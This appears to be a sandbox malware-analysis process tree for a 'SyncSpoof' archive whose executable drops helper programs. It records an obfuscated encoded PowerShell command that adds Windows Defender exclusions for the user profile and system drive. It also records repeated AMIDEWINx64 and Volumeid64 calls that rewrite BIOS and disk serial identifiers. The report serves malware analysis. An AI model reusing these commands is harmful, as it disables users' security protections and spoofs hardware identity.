  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3924
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.0.2075624564\1277855978" -parentBuildID 20221007134813 -prefsHandle 1676 -prefMapHandle 1664 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f9cb41dd-9c2c-41b7-9a78-44eb2089ecf1} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 1760 1c1dadd7b58 gpu
    3⤵
    PID:5220
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.1.1293260576\1278266178" -parentBuildID 20221007134813 -prefsHandle 2104 -prefMapHandle 2100 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81270b16-d2f8-46f5-9a3c-b1c1960a0a8a} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 2116 1c1cfb6fb58 socket
    3⤵
    PID:5288
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.2.749156012\889610766" -childID 1 -isForBrowser -prefsHandle 2668 -prefMapHandle 2656 -prefsLen 20866 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ae14e839-9978-4a68-86a8-82fd189705c6} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 2636 1c1dee94d58 tab
    3⤵
    PID:5740
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.3.505032116\1068236277" -childID 2 -isForBrowser -prefsHandle 3684 -prefMapHandle 3680 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a670ffd-b0c1-449a-8290-73678b01a5bc} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 3048 1c1cfb61c58 tab
    3⤵
    PID:5880
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.4.1287176272\892192438" -childID 3 -isForBrowser -prefsHandle 3948 -prefMapHandle 3956 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c9cf711-8e47-4bdf-8a42-c2d46f06d225} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 4060 1c1e0387b58 tab
    3⤵
    PID:5964
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.6.1891618948\608735465" -childID 5 -isForBrowser -prefsHandle 5072 -prefMapHandle 5076 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {14abf84b-3326-4ee0-924a-964e0fbe42e6} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 5064 1c1e132ba58 tab
    3⤵
    PID:5216
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.7.1336356557\543804695" -childID 6 -isForBrowser -prefsHandle 5268 -prefMapHandle 5272 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e913e5c5-9384-4f54-8ede-2a3b27b21a80} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 5260 1c1e132bd58 tab
    3⤵
    PID:1792
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.5.932176859\612512582" -childID 4 -isForBrowser -prefsHandle 4892 -prefMapHandle 4888 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8bc60ff0-ae83-4b95-a1d5-f1b6efda0d0f} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 4916 1c1cfb6ab58 tab
    3⤵
    PID:5196
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.8.1753644077\1194408718" -childID 7 -isForBrowser -prefsHandle 5792 -prefMapHandle 5544 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b953998-60e9-4900-9fb2-e0e4bcc8d4d9} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 5688 1c1e2841a58 tab
    3⤵
    PID:6524
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.9.331951054\1696494661" -childID 8 -isForBrowser -prefsHandle 5672 -prefMapHandle 2492 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4002761-4bf3-4aed-aa8e-f5cdaf94f317} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 4592 1c1dc294758 tab
    3⤵
    PID:6440
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.11.431359141\429244067" -childID 10 -isForBrowser -prefsHandle 9680 -prefMapHandle 2492 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {231326f9-75cd-434e-a735-fdd33d95e73e} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 3960 1c1e268ee58 tab
    3⤵
    PID:1528
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3924.10.812030221\712964128" -childID 9 -isForBrowser -prefsHandle 9684 -prefMapHandle 9252 -prefsLen 26503 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {103fdfa7-ec30-49dc-87eb-f48a98d6c5e8} 3924 "\\.\pipe\gecko-crash-server-pipe.3924" 9220 1c1e0a9e058 tab
    3⤵
    PID:796

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7072

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\SyncSpoof.rar"
1⤵
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4884

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3412

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3676
- C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
  C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 6547HP-TRGT29994AB
  2⤵
  PID:4688

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\SyncSpoof.rar"
1⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1520
- C:\Users\Admin\AppData\Local\Temp\7zO0F55ACC9\sync_spoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO0F55ACC9\sync_spoofer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetWindowsHookEx
  PID:2976
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAeABzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AZABkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAdABkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AbQB4ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:7132
- - C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
    "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6388
- - C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
    "C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
    3⤵
    - Executes dropped EXE
    PID:6348
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: MA4L-9E8J
      4⤵
      PID:6780
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: MA4L-9E8J
        5⤵
        Executes dropped EXE
        
        PID:6948
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      PID:740
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:2832
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 6527HP-TRGT31039AB
        5⤵
        
        PID:6628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:824
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 26527HP-TRGT31039RV
        5⤵
        
        PID:7052
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:6208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:6404
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:7060
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 46527HP-TRGT31039FA
        5⤵
        
        PID:948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:876
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 66530HP-TRGT9020FU
        5⤵
        
        PID:424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:1468
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 36530HP-TRGT9020DQ
        5⤵
        
        PID:6712
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:6708
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:4104
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        
        PID:6228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:7148
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:1092
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 86547HP-TRGT29994SG
        5⤵
        
        PID:4652
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:6772
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        
        PID:228
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:2784
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 56547HP-TRGT29994SL
        5⤵
        
        PID:1112
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:592
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 26547HP-TRGT29994RV
        5⤵
        
        PID:3684
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:1380
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 46547HP-TRGT29994FA
        5⤵
        
        PID:1452
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:6860
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 66547HP-TRGT29994FU
        5⤵
        
        PID:6552
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:2924
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 36547HP-TRGT29994DQ
        5⤵
        
        PID:2076
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:4120
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 76547HP-TRGT29994MST
        5⤵
        
        PID:4740
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:4624
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:3676
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:6336
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 6563HP-TRGT18200AB
        5⤵
        
        PID:3808
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:6928
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 26563HP-TRGT18200RV
        5⤵
        
        PID:4520
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:1648
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        Executes dropped EXE
        Enumerates connected drives
        Maps connected drives based on registry
        Checks SCSI registry key(s)
        Suspicious use of AdjustPrivilegeToken
        
        PID:1416
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:5428
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 86563HP-TRGT18200SG
        5⤵
        
        PID:68
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:5776
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 56563HP-TRGT18200SL
        5⤵
        
        PID:3320
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:1108
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 46563HP-TRGT18200FA
        5⤵
        
        PID:2076
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:5672
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 66563HP-TRGT18200FU
        5⤵
        
        PID:3080
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:6868
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 36563HP-TRGT18200DQ
        5⤵
        
        PID:6544
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:5020
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        
        PID:4772
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:240
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: H4H0-OT4A
      4⤵
      PID:5440
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: H4H0-OT4A
        5⤵
        
        PID:4492
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: HKZ0-80NJ
      4⤵
      PID:1636
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: HKZ0-80NJ
        5⤵
        
        PID:1540
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: AL4F-5O51
      4⤵
      PID:6732
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: AL4F-5O51
        5⤵
        
        PID:4844
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: I8MB-L3HU
      4⤵
      PID:3740
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: I8MB-L3HU
        5⤵
        
        PID:6624
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: OB9V-GC0V
      4⤵
      PID:1836
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: OB9V-GC0V
        5⤵
        
        PID:3048
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: JPRC-CNGT
      4⤵
      PID:5060
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: JPRC-CNGT
        5⤵
        
        PID:972
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: S95Z-BNTC
      4⤵
      PID:2308
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: S95Z-BNTC
        5⤵
        
        PID:6340
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: VEO1-AM09
      4⤵
      PID:1148
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: VEO1-AM09
        5⤵
        
        PID:6028
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 9MC6-CHR8
      4⤵
      PID:7148
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 9MC6-CHR8
        5⤵
        
        PID:6748
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 63H5-CALK
      4⤵
      PID:7116
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 63H5-CALK
        5⤵
        
        PID:920
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 7Z8S-IJB5
      4⤵
      PID:3828
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 7Z8S-IJB5
        5⤵
        
        PID:588
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: M36J-88G0
      4⤵
      PID:1140
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: M36J-88G0
        5⤵
        
        PID:428
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: E9AB-7G6N
      4⤵
      PID:5520
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: E9AB-7G6N
        5⤵
        
        PID:6940
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: 43G3-IIDH
      4⤵
      PID:6656
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: 43G3-IIDH
        5⤵
        
        PID:3704
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: V28M-O4ZT
      4⤵
      PID:2588
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: V28M-O4ZT
        5⤵
        
        PID:4408
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: S554-NKK7
      4⤵
      PID:2204
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: S554-NKK7
        5⤵
        
        PID:4448
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: VRAF-50FM
      4⤵
      PID:1644
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: VRAF-50FM
        5⤵
        
        PID:4716
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AOJ5-VV6P
      4⤵
      PID:3624
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: AOJ5-VV6P
        5⤵
        
        PID:5820
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C189-VIG2
      4⤵
      PID:7012
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: C189-VIG2
        5⤵
        
        PID:5732
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: JLA3-ZIFB
      4⤵
      PID:5528
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: JLA3-ZIFB
        5⤵
        
        PID:6456
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: 4L7D-FKPI
      4⤵
      PID:5632
